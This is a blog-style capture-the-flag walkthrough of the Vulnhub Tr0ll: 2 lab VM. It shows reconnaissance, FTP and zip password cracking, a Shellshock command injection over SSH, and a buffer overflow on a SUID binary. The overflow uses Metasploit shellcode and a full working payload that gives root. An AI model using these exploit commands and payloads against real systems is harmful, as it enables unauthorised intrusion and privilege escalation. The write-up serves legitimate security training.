[Vulnhub]Tr0ll: 2

“The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :) Difficulty is beginner++ to intermediate.” – Maleus

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali Linux (10.10.10.131/24)

Target: TopHatSec: Freshly (10.10.10.141/24)

Vulnerability & Exploit

  • Found hidden information in picture
  • Weak passwords used in FTP, login and download suspect encrypted zip file
  • Cracked the zip file with downloaded dictionary file and found user ‘noob’ and his SSH private key file
  • Shellshock bug give attacker a way to break in
  • Buffer Overflow analysis and exploit to get ROOT

Method

  • Scanned the network to discover the target server [Net Discover]
  • Port scanned the target to discover the running services and open ports [nmap]
  • Web application vulnerability scanned to discover any web vulnerability [nikto]
  • Analysis and write script to check folder list found in ‘robots.txt’
  • Web information gathering and interacting with the web server [firefox]
  • Download picture from four different folders and reveal the hidden information stored in one of the pictures
  • Found the hidden folder and download a base64 encoded file from it, after decoded it, that should be a dictionary file
  • Try the weak passwords for FTP login and found one works (Tr0ll / Tr0ll)
  • Downloaded encrypted zip file through FTP and crack it with dictionary file found before [fcrackzip]
  • Exploit shellshock bug with noob’s private key file to break into the target machine
  • Look around and found suspicious program with SUID bit set under the path ‘/nothing_to_see_here/choose_wisely/’
  • Analysis and work out PoC to exploit BoF vulnerability in the target program to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using netdiscover as routine to detect the target’s IP address (10.10.10.141 in this case).

10.10.10.141 is our Target!

Then run NMAP scan to detect opening ports/running services on the target. From the result, TCP port 21, 22 and 80 have been discovered running on Ubuntu Linux. nmap -sV -v -O -A -T5 -p- 10.10.10.141

Next, I run nikto scan on port 80 to check if there is any web vulnerability.

Nothing too exciting, but noticed that robots.txt found without disallow which is odd. As a result, I open iceweasel browser to have a close look at robots.txt.

Here I wrote a python script to check all of the directories in robots.txt and filter out working directories then saved in a file.

robot_check.py (robot_check.py) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python

import httplib
import urllib2

ip = '10.10.10.141'
img_name = 'cat_the_troll.jpg'

# read URIs found in robots.txt
f = open('robots.txt','r')
uri_list = f.readlines()
f.close()

uri_to_check = []

print '[*] Start checking ...'
for uri in uri_list:
  conn = httplib.HTTPConnection(ip)
  conn.request('GET', (uri.rstrip('\n')+'/'))
  response = conn.getresponse()

  if response.status != 404:                            # filter error code 404 to make the result nice and tidy
      print '[+] ' + uri.rstrip('\n')+'/'
      print '[-] ' + str(response.status)
      uri_to_check.append('http://' + ip + uri.rstrip('\n') + '/' + img_name) # if the response code is not 404 then put in uri_to_check list for further analysis

# save under inspection URIs to file for further analysis
print '[*] Saving result to file: uris_to_check.txt'
f = open('uris_to_check.txt', 'w')
for uri in uri_to_check:
  f.write(uri + '\n')
f.close()

print '[*] Done!'

Four directories gave 200 code response. Then I use wget with -i switch to download pictures from each directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
root@kali:~/tr0ll2# wget -i uris_to_check.txt 
--2015-06-23 06:19:05--  http://10.10.10.141/noob/cat_the_troll.jpg
Connecting to 10.10.10.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15831 (15K) [image/jpeg]
Saving to: `cat_the_troll.jpg'

100%[====================================================================================================================>] 15,831      --.-K/s   in 0s      

2015-06-23 06:19:05 (169 MB/s) - `cat_the_troll.jpg' saved [15831/15831]

--2015-06-23 06:19:05--  http://10.10.10.141/keep_trying/cat_the_troll.jpg
Reusing existing connection to 10.10.10.141:80.
HTTP request sent, awaiting response... 200 OK
Length: 15831 (15K) [image/jpeg]
Saving to: `cat_the_troll.jpg.1'

100%[====================================================================================================================>] 15,831      --.-K/s   in 0s      

2015-06-23 06:19:05 (89.2 MB/s) - `cat_the_troll.jpg.1' saved [15831/15831]

--2015-06-23 06:19:05--  http://10.10.10.141/dont_bother/cat_the_troll.jpg
Reusing existing connection to 10.10.10.141:80.
HTTP request sent, awaiting response... 200 OK
Length: 15873 (16K) [image/jpeg]
Saving to: `cat_the_troll.jpg.2'

100%[====================================================================================================================>] 15,873      --.-K/s   in 0s      

2015-06-23 06:19:05 (175 MB/s) - `cat_the_troll.jpg.2' saved [15873/15873]

--2015-06-23 06:19:05--  http://10.10.10.141/ok_this_is_it/cat_the_troll.jpg
Reusing existing connection to 10.10.10.141:80.
HTTP request sent, awaiting response... 200 OK
Length: 15831 (15K) [image/jpeg]
Saving to: `cat_the_troll.jpg.3'

100%[====================================================================================================================>] 15,831      --.-K/s   in 0s      

2015-06-23 06:19:05 (36.5 MB/s) - `cat_the_troll.jpg.3' saved [15831/15831]

FINISHED --2015-06-23 06:19:05--
Total wall clock time: 0.02s
Downloaded: 4 files, 62K in 0.001s (79.6 MB/s)
root@kali:~/tr0ll2# ls -alh
total 84K
drwxr-xr-x  2 root root 4.0K Jun 23 06:19 .
drwxr-xr-x 39 root root 4.0K Jun 23 04:58 ..
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg.1
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg.2
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg.3
-rwxr-xr-x  1 root root  927 Jun 23 06:18 robot_check.py
-rw-r--r--  1 root root  323 Jun 23 05:10 robots.txt
-rw-r--r--  1 root root  195 Jun 23 06:18 uris_to_check.txt

Next I use strings to check each downloaded picture to find hidden information.

1
2
3
4
5
6
7
8
9
10
root@kali:~/tr0ll2# strings cat_the_troll.jpg.2
JFIF
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
"aq2
... ... truncated ... ...
]=%em;
lj\p
*/ p?E$
Look Deep within y0ur_self for the answer

y0ur_self looks like another hidden directory on the server.

Found answer.txt file which the content looks like encoded by base64. Then I decoded and save to file answer2.txt.

1
root@kali:~/tr0ll2# cat answer.txt | base64 --decode > answer2.txt

This file is more like a dictionary file and will be useful later.

FTP & ZIP Crack

Now let’s move to FTP service.

1
2
3
4
5
6
7
8
9
10
root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.

I firstly tried anonymous user to login but failed. After checking the MOTD message and used Tr0ll / Tr0ll as login credential, I logged in successfully.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            1474 Oct 04  2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.00 secs (5272.7 kB/s)
ftp> bye
221 Goodbye.

Here I found a zip file. After I downloaded it and trying to unzip the lmao.zip, it was asking for password…

Next I try to crack the zip password with the dictionary file found before.

1
2
3
4
5
root@kali:~/tr0ll2# fcrackzip -v -D -u -p ~/tr0ll2/answer2.txt lmao.zip 
found file 'noob', (size cp/uc   1300/  1679, flags 9, chk 1005)


PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL

fcrackzip will found the password in seconds! Now I get in the lmao directory and found noob’s SSH key file.

SSH & Shellshock

Firstly, I tried to SSH login with noob’s key file directly but failed. It looks like there is something command run forced.

1
2
3
4
5
6
7
root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141
The authenticity of host '10.10.10.141 (10.10.10.141)' can't be established.
ECDSA key fingerprint is 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.141' (ECDSA) to the list of known hosts.
TRY HARDER LOL!
Connection to 10.10.10.141 closed.

By searching in google, I found shellshock bug will help to bypass this and make commands execute. For more details about how to exploit SSH via exploiting shellshock vulnerability, please check: here and here

So I tried the following command and it works!

1
2
3
4
5
6
7
8
9
10
root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141 '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
python -c "import pty; pty.spawn('/bin/bash')"
noob@Tr0ll2:~$ id
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
noob@Tr0ll2:~$ pwd
pwd
/home/noob

Now I have already broken into the shell.

By poking around in the file system, I found three ‘door’ files under /nothing_to_see_here/choose_wisely/. There is r00t file in each door folder and they will change every couple of minutes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -al *
ls -al *
door1:
total 16
drwsr-xr-x 2 root root 4096 Oct  4  2014 .
drwsr-xr-x 5 root root 4096 Oct  4  2014 ..
-rwsr-xr-x 1 root root 7271 Oct  4  2014 r00t

door2:
total 20
drwsr-xr-x 2 root root 4096 Oct  5  2014 .
drwsr-xr-x 5 root root 4096 Oct  4  2014 ..
-rwsr-xr-x 1 root root 8401 Oct  5  2014 r00t

door3:
total 16
drwsr-xr-x 2 root root 4096 Oct  5  2014 .
drwsr-xr-x 5 root root 4096 Oct  4  2014 ..
-rwsr-xr-x 1 root root 7273 Oct  5  2014 r00t

After several trial and error, I found the r00t file with biggest size is the target which is vulnerable to buffer overflow.

1
2
3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./r00t $(python -c 'print "A" * 500')
<_here/choose_wisely/door1$ ./r00t $(python -c 'print "A" * 500')            
Segmentation fault

Aha, Segmentation fault looks good so far. Then I upload checksec.sh script to check protections.

1
2
3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./checksec.sh --file r00t 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   r00t

Great, nearly no protection. Now it’s time to move on to find and overflow the EIP.

Firstly, I use pattern_create.rb to generate 500 unique strings:

1
2
root@kali:~/tr0ll2# /usr/share/metasploit-framework/tools/pattern_create.rb 500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

Then use gdb on target machine to track the value of EIP when overflow happened.

1
2
3
4
5
6
7
8
9
10
11
12
13
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ gdb -q ./r00t
gdb -q ./r00t
Reading symbols from /nothing_to_see_here/choose_wisely/door1/r00t...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
<7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq                  
Starting program: /nothing_to_see_here/choose_wisely/door1/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
(gdb) i r esp
i r esp
esp            0xbffffab0 0xbffffab0
(gdb)

0x6a413969 is the pattern, and I use pattern_offset.rb to get the offset is 268. Also, I got the value in ESP is 0xbffffab0

1
2
root@kali:~/tr0ll2# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x6a413969
[*] Exact match at offset 268

Then I use metasploit to generate a shellcode to run /bin/sh.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf payload(exec) > generate -b '\x00\x0a\x0d'
# linux/x86/exec - 70 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, CMD=/bin/sh
buf = 
"\xba\xa0\x7b\x18\x95\xdb\xcd\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x0b\x31\x50\x15\x83\xe8\xfc\x03\x50\x11\xe2\x55\x11" +
"\x13\xcd\x0c\xb4\x45\x85\x03\x5a\x03\xb2\x33\xb3\x60\x55" +
"\xc3\xa3\xa9\xc7\xaa\x5d\x3f\xe4\x7e\x4a\x37\xeb\x7e\x8a" +
"\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93"
msf payload(exec) >

Next, construct the payload and exploit the r00t file to get ROOT on the target!

1
2
3
4
5
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t $(python -c "print 'A' * 268 + '\x80\xfb\xff\xbf' + '\x90' * 16 + '\xba\xa0\x7b\x18\x95\xdb\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0b\x31\x50\x15\x83\xe8\xfc\x03\x50\x11\xe2\x55\x11\x13\xcd\x0c\xb4\x45\x85\x03\x5a\x03\xb2\x33\xb3\x60\x55\xc3\xa3\xa9\xc7\xaa\x5d\x3f\xe4\x7e\x4a\x37\xeb\x7e\x8a\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93'")
<7\xeb\x7e\x8a\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93'")    
# id
id
uid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)

And then take the FLAG down!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# cd /root
cd /root
# ls -al
ls -al
total 80
drwx------ 11 root   root   4096 Oct 14  2014 .
drwxr-xr-x 23 root   root   4096 Oct  5  2014 ..
-rw-------  1 root   root     67 Oct 14  2014 .bash_history
-rw-r--r--  1 root   root   3106 Apr 19  2012 .bashrc
-rw-r--r--  1 root   root    140 Apr 19  2012 .profile
-rw-r--r--  1 root   root     66 Oct  5  2014 .selected_editor
drwx------  2 root   root   4096 Oct  4  2014 .ssh
drwxr-xr-x  2 root   root   4096 Oct  5  2014 .vim
-rw-------  1 root   root   4259 Oct 14  2014 .viminfo
-rw-r--r--  1 root   root     68 Oct  6  2014 Proof.txt
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core1
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core2
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core3
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core4
drwxr-xr-x  2 root   root   4096 Oct  5  2014 goal
drwxr-xr-x  2 root   root   4096 Oct  6  2014 hardmode
-rw-r--r--  1 maleus maleus 1474 Oct  4  2014 lmao.zip
-rw-r--r--  1 root   root    828 Oct  4  2014 ran_dir.py
drwxr-xr-x  2 root   root   4096 Oct  6  2014 reboot
# cat Proof.txt
cat Proof.txt
You win this time young Jedi...

a70354f0258dcc00292c72aab3c8b1e4  
#
2015-06-24 04:31:06 -0400